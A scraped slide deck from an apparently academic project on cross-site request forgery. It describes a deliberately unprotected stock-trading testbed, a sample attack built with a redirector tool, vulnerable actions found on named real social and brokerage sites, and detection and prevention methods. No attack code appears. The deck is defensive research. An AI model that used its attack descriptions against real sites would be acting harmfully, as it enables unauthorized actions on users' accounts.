Download presentation
Presentation is loading. Please wait.
Published byClemence Rogers Modified over 9 years ago
1
Optimizing Traditional and Advocating New Prevention Methods Mark Jenne Tatiana Alexenko Cross-Site-Request-Forgery
2
CSRF Overview Forces user to send unauthorized requests by interacting with a malicious website. The “sleeping giant” of all cyber security threats. Can force someone to transfer money, change status on social networking site, buy stock, or any other action on a vulnerable website an attacker would like to exploit.
3
CSRF Overview
4
Original Project Plan Week 2: Reading and Preparation Gain a better understanding of csrf attack mechanisms Weeks 3-4: Perform Simple CSRF Attacks Develop testbed and exploit generated site Weeks 5-7: Implement Defense Mechanisms Referrer-checking, reconfirmation, any others Weeks 8-9: Final Preparation Finalize project, conference paper, presentation
5
Alterations to the Plan Reconfirmation protection method Recon value to be based of off the trace path Trace path would not work since it would just go back to the user's browser. Would be unable to compare trace path of user and attack since both would lead to same machine. CCNC Conference Decided to submit paper to CCNC instead of ACM hotnets. Social Networking specification – had to find exploits in well-known social networks to present.
6
Test Bed Application Stock trading application Registered users can buy and sell stock based on prices from Yahoo Finance. Utilizes an AJAX request to retrieve stock information in real time Does not implement any CSRF protection methods – allowed us to concentrate on CSRF without the presence of XSS.
7
Test Bed Application
8
Sample Attack This attack uses Chris Shiflett’s CSRF Redirector. The CSRF Redirector creates a form with all the necessary inputs that submits to the target application on the vulnerable website.
9
Discovered Vulnerabilities Hi5.com—Yahoo’s Social Networking Website Change Profile Skin Change Status Add Applications Sharebuilder.com—ING’s Online Stock Brokerage Buy/Sell shares of stock Requires 2 requests for attack
10
Referer Privacy Guard Firefox extension that disorders browsing history Will encourage more users to send Referer Headers Sends “garbage” requests to random URLs from user’s browsing history http://sourceforge.net/projects/refererprivacyg/ Our extension is on SourceForge available for download SVN repository for developers set up
11
CSRF Signature Detection Preview page content in sandboxed manner Don’t allow any state-changing requests until content is checked Find deep links and compare to URL in address bar Allow users to whitelist domain pairs Preview linked content—images, iframes Block forms with only “hidden” inputs Block self-submitting forms unless user approves
12
Conclusions CSRF can be prevented User: Log out and clear cookies often Developer Make sure website not vulnerable to XSS Use form tokens and use them wisely Check Referer header Lenient for now Possibly strict when privacy issue resolved
13
Conclusions CSRF can be detected While application specific, certain features are similar Limited number of tags and Javascript functions that can be used to implement and disguise attack Hidden and self-submitting forms have little practical use Whitelisting of trusted sites for user convenience
14
Questions
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.